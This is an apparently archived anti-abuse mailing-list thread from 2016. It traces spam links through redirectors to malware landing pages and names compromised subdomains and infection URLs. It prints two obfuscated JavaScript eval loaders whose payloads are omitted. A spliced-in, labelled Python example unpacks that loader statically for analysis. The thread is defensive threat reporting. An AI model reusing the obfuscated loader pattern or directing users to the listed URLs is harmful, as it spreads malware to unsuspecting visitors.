Re: [anti-abuse-wg] Malware/ransomware current live distribution IPs
andre@ox.co.za you wrote:
If you would like to add superblock.ascams.com - these seem like good links:
Exim: http://www.exim.org/howto/rbl.html
Postfix: https://www.howtoforge.com/block_spam_at_mta_level_postfix
Note: The specific domains and IPs I have just posted are pointless to block in mail server configs, because the final "landing page" domains that are actually spreading the infectious agents are never seen, and will never be seen in e-mails. Rather, there _is_ spam... lots of it... trying to get people to go to these infection domains, but only via a sequence of one or two redirections (through other domains) first.

Regards,
rfg
In message <15295.1467317095@server1.tristatelogic.com>, I wrote:
andre@ox.co.za you wrote:
If you would like to add superblock.ascams.com - these seem like good links:
Exim: http://www.exim.org/howto/rbl.html
Postfix: https://www.howtoforge.com/block_spam_at_mta_level_postfix
Note: The specific domains and IPs I have just posted are pointless to block in mail server configs, because the final "landing page" domains that are actually spreading the infectious agents are never seen, and will never be seen in e-mails. Rather, there _is_ spam... lots of it... trying to get people to go to these infection domains, but only via a sequence of one or two redirections (through other domains) first.
Conveniently, to further this point, these same spammers just sent me ANOTHER one of their standard spams.

** WARNING ** Browsing to the URL below may result in infection!

Spam body/payload:
=============================================================================
Hello,

Here is some information that inspired me a lot, read it please, it may be helpful

<http://xishentothi.politicalresumes.com/xyrzxk>

Yours faithfully,
fistvani@andrew.cmu.edu

Hello,

Here is some information that inspired me a lot, read it please, it may be helpful

[1]http://xishentothi.politicalresumes.com/xyrzxk

Yours faithfully,
fistvani@andrew.cmu.edu

References
1. http://xishentothi.politicalresumes.com/xyrzxk
=============================================================================

Please note that actually, the domain "politicalresumes.com" does not... except in a very limited sense... "belong" to the spammer(s). Rather, as has been reported by (I believe) Cisco/Talos, the actual owner of this domain has simply been infected, and whatever credentials he uses to control/manipulate the DNS for his domain have been absconded with by the spammer(s). They in turn have *added* several new subdomains to this base domain name. These currently include, at the very least:

fekudamo.politicalresumes.com
lardipruto.politicalresumes.com
rdostapidy.politicalresumes.com
wongakyma.politicalresumes.com
xishentothi.politicalresumes.com

Anyway, following the link in the above spam payload/body gets you to a trivial redirector... kindly hosted by Godaddy... which then attempts to take you to this new URL:

http://gooodweightlossgood.com/?a=388338&c=wl_con&s=33

There is another redirection once you get there. When you get to the final landing page, that's the one where you get infected with/by Javascript malware.

Regards,
rfg
In message <15749.1467320923@server1.tristatelogic.com>, I wrote:
Anyway, following the link in the above spam payload/body gets you to a trivial redirector... kindly hosted by Godaddy... which then attempts to take you to this new URL:
http://gooodweightlossgood.com/?a=388338&c=wl_con&s=33
There is another redirection once you get there.
The additional redirection takes you to:

http://372-beauty.gooodweightlossgood.com/us/newd/scux/cla-safflower-oil/

Note however that the content being served up here is *only* an advert for a useless diet supplement (CLA Safflower Oil)... *not* a hunk of Javascript malware.

I have yet to figure this out exactly. Some of the time, these sites serve up unambiguous (and heavily encoded) Javascript malware. (See below.) Other times, they don't. I confess that I haven't figured out the pattern yet, or even whether it is a time-dependent thing.

Regards,
rfg

malware sample 1:
==============================================================================
<!DOCTYPE html>
<html>
<head>
<script language="javascript" type="text/javascript">
var _1Ol='[encoded payload omitted]';
function _0l0(data){var OOIlOI="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";var o1,o2,o3,h1,h2,h3,h4,bits,i=0,enc='';do{h1=OOIlOI.indexOf(data.charAt(i++));h2=OOIlOI.indexOf(data.charAt(i++));h3=OOIlOI.indexOf(data.charAt(i++));h4=OOIlOI.indexOf(data.charAt(i++));bits=h1<<18|h2<<12|h3<<6|h4;o1=bits>>16&0xff;o2=bits>>8&0xff;o3=bits&0xff;if(h3==64){enc+=String.fromCharCode(o1)}else if(h4==64){enc+=String.fromCharCode(o1,o2)}else{enc+=String.fromCharCode(o1,o2,o3)}}while(i<data.length);return enc}
function OOI(string){ var ret = '', i = 0; for ( i = string.length-1; i >= 0; i-- ){ ret += string.charAt(i);} return ret; }
eval(_0l0(OOI(_1Ol)));
</script>
</head>
<body>
</body>
</html>
==============================================================================

Malware sample 2:
==============================================================================
<!DOCTYPE html>
<html>
<head>
<script language="javascript" type="text/javascript">
var I1O='[encoded payload omitted]';
function OlI(data){var _011lOI="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";var o1,o2,o3,h1,h2,h3,h4,bits,i=0,enc='';do{h1=_011lOI.indexOf(data.charAt(i++));h2=_011lOI.indexOf(data.charAt(i++));h3=_011lOI.indexOf(data.charAt(i++));h4=_011lOI.indexOf(data.charAt(i++));bits=h1<<18|h2<<12|h3<<6|h4;o1=bits>>16&0xff;o2=bits>>8&0xff;o3=bits&0xff;if(h3==64){enc+=String.fromCharCode(o1)}else if(h4==64){enc+=String.fromCharCode(o1,o2)}else{enc+=String.fromCharCode(o1,o2,o3)}}while(i<data.length);return enc}
function _011(string){ var ret = '', i = 0; for ( i = string.length-1; i >= 0; i-- ){ ret += string.charAt(i);} return ret; }
eval(OlI(_011(I1O)));
</script>
</head>
<body>
</body>
</html>
==============================================================================
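Both samples above use the same loader: a string literal is reversed, base64-decoded, and the result handed to eval(). The following is an added example, not part of the original post, that recovers that next stage statically without executing anything; the function names and the harmless sample page built by build_sample() are constructed for illustration.

```python
import base64
import re

# Tail of the loader seen in both samples: eval(decode(reverse(variable)))
EVAL_CHAIN = re.compile(r"eval\(\s*([\w$]+)\(\s*([\w$]+)\(\s*([\w$]+)\s*\)\s*\)\s*\)")
B64_ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="


def unpack_reverse_b64(page):
    """Return the next-stage script text, or None if the loader shape is absent.

    Nothing is executed: the string literal is reversed and decoded as data.
    """
    chain = EVAL_CHAIN.search(page)
    if chain is None:
        return None
    variable = chain.group(3)
    # Archive line-wrapping can split long literals, so compare without whitespace.
    if B64_ALPHABET not in re.sub(r"\s+", "", page):
        return None
    literal = re.search(r"var\s+%s\s*=\s*'([^']*)'" % re.escape(variable), page)
    if literal is None:
        return None
    blob = re.sub(r"\s+", "", literal.group(1))
    try:
        raw = base64.b64decode(blob[::-1], validate=True)
    except ValueError:  # binascii.Error subclasses ValueError
        return None
    # The JavaScript decoder emits one character per byte; latin-1 mirrors that.
    return raw.decode("latin-1")


def build_sample(stage2):
    """Constructed, harmless page with the same loader layout (assumption)."""
    blob = base64.b64encode(stage2.encode("latin-1")).decode("ascii")[::-1]
    return (
        "<script>var _v='%s';"
        'function _d(data){var k="%s";/* base64 loop */}'
        "function _r(s){/* reverse loop */}"
        "eval(_d(_r(_v)));</script>"
    ) % (blob, B64_ALPHABET)


if __name__ == "__main__":
    print(unpack_reverse_b64(build_sample('document.title="stage2";')))
```

Only the outer layer shown in the samples is handled; whatever the decoded text contains still has to be analysed as untrusted data.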
On Thu, 30 Jun 2016 14:08:43 -0700 "Ronald F. Guilmette" <rfg@tristatelogic.com> wrote:
In message <15295.1467317095@server1.tristatelogic.com>, I wrote:
If you would like to add superblock.ascams.com - these seem like good links:
Exim: http://www.exim.org/howto/rbl.html
Postfix: https://www.howtoforge.com/block_spam_at_mta_level_postfix
Note: The specific domains and IPs I have just posted are pointless to block in mail server configs, because the final "landing page" domains that are actually spreading the infectious agents are never seen, and will never be seen in e-mails. Rather, there _is_ spam... lots of it... trying to get people to go to these infection domains, but only via a sequence of one or two redirections (through other domains) first.
Conveniently, to further this point, these same spammers just sent me ANOTHER one of their standard spams. ** WARNING ** Browsing to the URL below may result in infection!
on the dnsbl - superblock.ascams.com it is all mixed - as abuse, as the same resources in the same ip's and subnets are re-purposed every now and then...even the bot controllers and the bots themselves are listed together, currently on spamid.net - I still need to set up separate dnsbl for bots, controllers, etc.

So, where you are now getting your payloads may be used for something else tomorrow...

You will find though, that the superblock.ascams.com list will reduce your incoming spam by quite a lot? - you can tell me the percentage?

Regards
Andre
On Fri, 1 Jul 2016 06:22:08 +0200 andre@ox.co.za wrote:
on the dnsbl - superblock.ascams.com it is all mixed - as abuse, as the same resources in the same ip's and subnets are re-purposed every now and then...even the bot controllers and the bots themselves are listed together, currently on spamid.net - I still need to set up separate dnsbl for bots, controllers, etc.
So, where you are now getting your payloads may be used for something else tomorrow... You will find though, that the superblock.ascams.com list will reduce your incoming spam by quite a lot? - you can tell me the percentage?
So, I reply to you and list - email to you is bouncing... on a good reputation ipv4? Ronald, this must be impacting your email quite a lot? It is an ipv6 bounce (dnswl) on an ipv4 number... but it does not tell the recipient how to list/delist...

rfg@tristatelogic.com
host server1.tristatelogic.com [69.62.255.118]
SMTP error from remote mail server after RCPT TO:<rfg@tristatelogic.com>:
550 5.7.1 Service unavailable; Unverified Client host [hostacc.com] blocked using black.uribl.com; 127.0.0.1 -> Query Refused. See http://uribl.com/refused.shtml for more information [Your DNS IP: 74.125.80.70]

go read the rfc bits, at the bottom, here: http://spamid.net/?spam=definitions

this "bounce" does not tell the sender how to delist from "black.uribl.com" etc. or to list - if it is a white list, etc. etc

Andre
Participants (2): andre@ox.co.za, Ronald F. Guilmette